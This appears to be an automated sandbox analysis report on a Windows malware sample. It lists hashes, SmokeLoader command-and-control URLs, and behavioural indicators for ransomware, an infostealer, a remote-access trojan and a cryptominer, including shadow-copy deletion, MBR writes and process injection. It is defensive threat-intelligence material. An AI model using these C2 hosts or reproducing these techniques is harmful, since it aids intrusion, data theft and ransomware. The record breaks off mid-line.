Analysis
-
max time kernel
300s -
max time network
304s -
platform
windows10-1703_x64 -
resource
win10-20230915-en -
resource tags
arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system -
submitted
16-09-2023 04:47
Static task
static1
Behavioral task
behavioral1
Sample
32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe
Resource
win10-20230915-en
General
-
Target
32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe
-
Size
476KB
-
MD5
76f37b780edf118a0364fab327167a0c
-
SHA1
78dbbff57068378e4709afea5ba35561eb157ef5
-
SHA256
32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e
-
SHA512
f677065ad4a920fbd819dae3eff010f35b794ac3d2f2031acbad8162fa4cb9d398420ba5d665b4260f0a17832d149e617d097be5c4986ea7a31a33fd3878b7b3
-
SSDEEP
12288:y5QaO7SIsbbv4/lDv0zMrcoZPPPKW1ICFBCGw:ravv4tDKMrVPKsIkCGw
Malware Config
Extracted
smokeloader
2022
http://serverxlogs21.xyz/statweb255/
http://servxblog79.xyz/statweb255/
http://demblog289.xyz/statweb255/
http://admlogs77x.online/statweb255/
http://blogxstat38.xyz/statweb255/
http://blogxstat25.xyz/statweb255/
Signatures
-
Ammyy Admin
Remote admin tool with various capabilities.
-
AmmyyAdmin payload 2 IoCs
Processes:
resource yara_rule behavioral2/files/0x000600000001aff7-2126.dat family_ammyyadmin behavioral2/files/0x000600000001aff7-2133.dat family_ammyyadmin -
Detect rhadamanthys stealer shellcode 6 IoCs
Processes:
resource yara_rule behavioral2/memory/2628-14-0x0000000002F60000-0x0000000003360000-memory.dmp family_rhadamanthys behavioral2/memory/2628-16-0x0000000002F60000-0x0000000003360000-memory.dmp family_rhadamanthys behavioral2/memory/2628-15-0x0000000002F60000-0x0000000003360000-memory.dmp family_rhadamanthys behavioral2/memory/2628-17-0x0000000002F60000-0x0000000003360000-memory.dmp family_rhadamanthys behavioral2/memory/2628-29-0x0000000002F60000-0x0000000003360000-memory.dmp family_rhadamanthys behavioral2/memory/2628-31-0x0000000002F60000-0x0000000003360000-memory.dmp family_rhadamanthys -
FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
-
Phobos
Phobos ransomware appeared at the beginning of 2019.
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exedescription pid Process procid_target PID 2628 created 3308 2628 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe 54 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid Process 912 bcdedit.exe 3900 bcdedit.exe -
Renames multiple (67) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3528-1940-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/3528-1967-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig -
Processes:
wbadmin.exepid Process 4512 wbadmin.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
svchost.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000\Control Panel\International\Geo\Nation svchost.exe -
Deletes itself 1 IoCs
Processes:
certreq.exepid Process 4728 certreq.exe -
Drops startup file 1 IoCs
Processes:
2(7(wves.exedescription ioc Process File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\2(7(wves.exe 2(7(wves.exe -
Executes dropped EXE 16 IoCs
Processes:
fcXG3m].exe~yVReL.exefcXG3m].exefcXG3m].exefcXG3m].exe2(7(wves.exe2(7(wves.exe2(7(wves.exe2(7(wves.exe7CCC.exe7CCC.exe7CCC.exe80D4.exesvchost.exeiguvhsgiguvhsgpid Process 4256 fcXG3m].exe 4516 ~yVReL.exe 4332 fcXG3m].exe 1140 fcXG3m].exe 4752 fcXG3m].exe 2288 2(7(wves.exe 3640 2(7(wves.exe 4676 2(7(wves.exe 4652 2(7(wves.exe 2848 7CCC.exe 4464 7CCC.exe 4504 7CCC.exe 2324 80D4.exe 2204 svchost.exe 4292 iguvhsg 3264 iguvhsg -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
Processes:
certreq.exeexplorer.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
2(7(wves.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000\Software\Microsoft\Windows\CurrentVersion\Run\2(7(wves = "C:\\Users\\Admin\\AppData\\Local\\2(7(wves.exe" 2(7(wves.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2(7(wves = "C:\\Users\\Admin\\AppData\\Local\\2(7(wves.exe" 2(7(wves.exe -
Drops desktop.ini file(s) 5 IoCs
Processes:
2(7(wves.exeexplorer.exedescription ioc Process File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1384669652-2270756765-572751751-1000\desktop.ini 2(7(wves.exe File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\Desktop.ini 2(7(wves.exe File opened for modification C:\Program Files\desktop.ini 2(7(wves.exe File opened for modification C:\$RECYCLE.BIN\S-1-5-21-1384669652-2270756765-572751751-1000\desktop.ini explorer.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-1384669652-2270756765-572751751-1000\desktop.ini 2(7(wves.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
svchost.exedescription ioc Process File opened for modification \??\PhysicalDrive0 svchost.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exefcXG3m].exe2(7(wves.exe~yVReL.exe2(7(wves.exeaspnet_compiler.exe7CCC.exeiguvhsgdescription pid Process procid_target PID 4924 set thread context of 2628 4924 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe 71 PID 4256 set thread context of 4752 4256 fcXG3m].exe 79 PID 2288 set thread context of 3640 2288 2(7(wves.exe 81 PID 4516 set thread context of 3908 4516 ~yVReL.exe 83 PID 4676 set thread context of 4652 4676 2(7(wves.exe 85 PID 3908 set thread context of 3528 3908 aspnet_compiler.exe 103 PID 2848 set thread context of 4464 2848 7CCC.exe 105 PID 4292 set thread context of 3264 4292 iguvhsg 128 -
Drops file in Program Files directory 64 IoCs
Processes:
2(7(wves.exedescription ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar 2(7(wves.exe File opened for modification C:\Program Files\7-Zip\Lang\fur.txt 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_zh_4.4.0.v20140623020002.jar 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\bin\glass.dll.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF 2(7(wves.exe File opened for modification C:\Program Files\7-Zip\Lang\fy.txt 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface_3.10.1.v20140813-1009.jar 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\README-JDK.html 2(7(wves.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.zh-cn.dll 2(7(wves.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base.xml 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\javafx_iio.dll 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496939244.profile.gz 2(7(wves.exe File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.de-de.dll.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javafxpackager.exe 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\ffjcext.zip.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-text.xml 2(7(wves.exe File created C:\Program Files\7-Zip\Lang\fa.txt.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar 2(7(wves.exe File opened for modification C:\Program Files\Internet Explorer\en-US\ieinstal.exe.mui 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\license.html.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_zh_4.4.0.v20140623020002.jar 2(7(wves.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\symbase.xml 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-loaders.xml 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\bin\ktab.exe.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_zh_CN.jar.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui 2(7(wves.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\it-IT\rtscom.dll.mui 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\nbexec64.exe 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml 2(7(wves.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\oskmenubase.xml 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\sunjce_provider.jar 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_zh_4.4.0.v20140623020002.jar 2(7(wves.exe File opened for modification C:\Program Files\Common Files\System\msadc\it-IT\msadcor.dll.mui 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml 2(7(wves.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-ES\FlickLearningWizard.exe.mui 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\masterix.gif.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-swing-outline.xml.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\core_visualvm.jar.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\tpcps.dll 2(7(wves.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar 2(7(wves.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.xml.id[DE7B6091-3483].[[email protected]].8base 2(7(wves.exe -
Checks SCSI registry key(s) 3 TTPs 10 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
fcXG3m].exevds.exeiguvhsgdescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fcXG3m].exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fcXG3m].exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iguvhsg Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fcXG3m].exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iguvhsg Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iguvhsg -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
certreq.exedescription ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 certreq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString certreq.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid Process 3304 vssadmin.exe -
Modifies registry class 2 IoCs
Processes:
Explorer.EXEdescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.execertreq.exefcXG3m].exefcXG3m].exe~yVReL.exeExplorer.EXE2(7(wves.exepid Process 4924 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe 4924 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe 2628 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe 2628 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe 2628 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe 2628 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe 4728 certreq.exe 4728 certreq.exe 4728 certreq.exe 4728 certreq.exe 4256 fcXG3m].exe 4256 fcXG3m].exe 4256 fcXG3m].exe 4256 fcXG3m].exe 4752 fcXG3m].exe 4752 fcXG3m].exe 4516 ~yVReL.exe 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3640 2(7(wves.exe 3640 2(7(wves.exe 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3640 2(7(wves.exe 3640 2(7(wves.exe 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid Process 3308 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid Process 624 -
Suspicious behavior: MapViewOfSection 33 IoCs
Processes:
fcXG3m].exeExplorer.EXEexplorer.exepid Process 4752 fcXG3m].exe 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 4748 explorer.exe 4748 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exefcXG3m].exe2(7(wves.exe~yVReL.exe2(7(wves.exeaspnet_compiler.exe2(7(wves.exevssvc.exeWMIC.exeExplorer.EXEwbengine.exeAddInProcess.exe7CCC.exedescription pid Process Token: SeDebugPrivilege 4924 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe Token: SeDebugPrivilege 4256 fcXG3m].exe Token: SeDebugPrivilege 2288 2(7(wves.exe Token: SeDebugPrivilege 4516 ~yVReL.exe Token: SeDebugPrivilege 4676 2(7(wves.exe Token: SeDebugPrivilege 3908 aspnet_compiler.exe Token: SeDebugPrivilege 3640 2(7(wves.exe Token: SeBackupPrivilege 4424 vssvc.exe Token: SeRestorePrivilege 4424 vssvc.exe Token: SeAuditPrivilege 4424 vssvc.exe Token: SeIncreaseQuotaPrivilege 1388 WMIC.exe Token: SeSecurityPrivilege 1388 WMIC.exe Token: SeTakeOwnershipPrivilege 1388 WMIC.exe Token: SeLoadDriverPrivilege 1388 WMIC.exe Token: SeSystemProfilePrivilege 1388 WMIC.exe Token: SeSystemtimePrivilege 1388 WMIC.exe Token: SeProfSingleProcessPrivilege 1388 WMIC.exe Token: SeIncBasePriorityPrivilege 1388 WMIC.exe Token: SeCreatePagefilePrivilege 1388 WMIC.exe Token: SeBackupPrivilege 1388 WMIC.exe Token: SeRestorePrivilege 1388 WMIC.exe Token: SeShutdownPrivilege 1388 WMIC.exe Token: SeDebugPrivilege 1388 WMIC.exe Token: SeSystemEnvironmentPrivilege 1388 WMIC.exe Token: SeRemoteShutdownPrivilege 1388 WMIC.exe Token: SeUndockPrivilege 1388 WMIC.exe Token: SeManageVolumePrivilege 1388 WMIC.exe Token: 33 1388 WMIC.exe Token: 34 1388 WMIC.exe Token: 35 1388 WMIC.exe Token: 36 1388 WMIC.exe Token: SeIncreaseQuotaPrivilege 1388 WMIC.exe Token: SeSecurityPrivilege 1388 WMIC.exe Token: SeTakeOwnershipPrivilege 1388 WMIC.exe Token: SeLoadDriverPrivilege 1388 WMIC.exe Token: SeSystemProfilePrivilege 1388 WMIC.exe Token: SeSystemtimePrivilege 1388 WMIC.exe Token: SeProfSingleProcessPrivilege 1388 WMIC.exe Token: SeIncBasePriorityPrivilege 1388 WMIC.exe Token: SeCreatePagefilePrivilege 1388 WMIC.exe Token: SeBackupPrivilege 1388 WMIC.exe Token: SeRestorePrivilege 1388 WMIC.exe Token: SeShutdownPrivilege 1388 WMIC.exe Token: SeDebugPrivilege 1388 WMIC.exe Token: SeSystemEnvironmentPrivilege 1388 WMIC.exe Token: SeRemoteShutdownPrivilege 1388 WMIC.exe Token: SeUndockPrivilege 1388 WMIC.exe Token: SeManageVolumePrivilege 1388 WMIC.exe Token: 33 1388 WMIC.exe Token: 34 1388 WMIC.exe Token: 35 1388 WMIC.exe Token: 36 1388 WMIC.exe Token: SeShutdownPrivilege 3308 Explorer.EXE Token: SeCreatePagefilePrivilege 3308 Explorer.EXE Token: SeBackupPrivilege 2248 wbengine.exe Token: SeRestorePrivilege 2248 wbengine.exe Token: SeSecurityPrivilege 2248 wbengine.exe Token: SeShutdownPrivilege 3308 Explorer.EXE Token: SeCreatePagefilePrivilege 3308 Explorer.EXE Token: SeLockMemoryPrivilege 3528 AddInProcess.exe Token: SeLockMemoryPrivilege 3528 AddInProcess.exe Token: SeDebugPrivilege 2848 7CCC.exe Token: SeShutdownPrivilege 3308 Explorer.EXE Token: SeCreatePagefilePrivilege 3308 Explorer.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
AddInProcess.exesvchost.exepid Process 3528 AddInProcess.exe 2204 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exefcXG3m].exe2(7(wves.exe~yVReL.exe2(7(wves.exe2(7(wves.execmd.execmd.exedescription pid Process procid_target PID 4924 wrote to memory of 2332 4924 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe 70 PID 4924 wrote to memory of 2332 4924 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe 70 PID 4924 wrote to memory of 2332 4924 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe 70 PID 4924 wrote to memory of 2628 4924 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe 71 PID 4924 wrote to memory of 2628 4924 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe 71 PID 4924 wrote to memory of 2628 4924 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe 71 PID 4924 wrote to memory of 2628 4924 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe 71 PID 4924 wrote to memory of 2628 4924 32c9c069c7fe9ffdd9086b957e45c03993863730cd1eed4815e226dc1b7b436e.exe 71 PID 4924 wrote to 